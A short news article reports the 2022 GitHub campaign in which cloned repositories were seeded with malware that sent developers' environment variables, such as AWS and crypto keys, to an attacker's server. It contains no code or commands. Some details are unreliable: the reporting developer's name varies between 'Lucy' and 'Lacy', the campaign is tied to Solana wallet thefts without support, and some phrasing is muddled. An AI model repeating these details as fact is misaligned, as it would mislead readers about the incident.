To ensure that all revisions can be verified, the developer who discovered the vulnerability asked developers to sign their revisions using the GPG key.
GitHub, a major developer platform, was hit by widespread malware. It reported 35,000 code hits on a day that saw thousands Solana wallets emptied for millions of dollars.
Stephen Lucy, a GitHub developer, first reported the widespread attack on Wednesday. This issue was discovered by the developer while reviewing a project that he had found via a Google search.
The attack has affected several projects including crypto, Golang and Python as well as js, Bash and Docker. The malware attack targets docker images and install docs. NPM script is a convenient way for common shell commands to be bundled together in a project.
I am uncovering what seems to be a massive widespread malware attack on @github.
— Stephen Lacy (@stephenlacy) August 3, 2022
- Currently over 35k repositories are infected
- So far found in projects including: crypto, golang, python, js, bash, docker, k8s
- It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9
In order to fool developers and gain access to critical data, the attacker creates a fake repositorie (a repository that contains all files in the project and their revision history) and then pushes clones to GitHub. The following snapshots illustrate this legit crypto miner and its clone.
Many of these clone repositories were pushed using “pull requests”. Pull requests allow developers to share information about the changes they made to a branch in a repository at GitHub.
The entire environment variable (ENV), which includes the script, application and laptop (electron applications), is sent to an attacker’s server once the developer has fallen prey to the malware attack. ENV can include security keys, AWS access key, crypto keys, and many other items.
The developer reported the issue to GitHub. He advised developers to GPG-sign their revisions to the repository. GPG keys provide extra security for your GitHub account and software projects. They allow you to verify that all revisions have come from a trusted source.
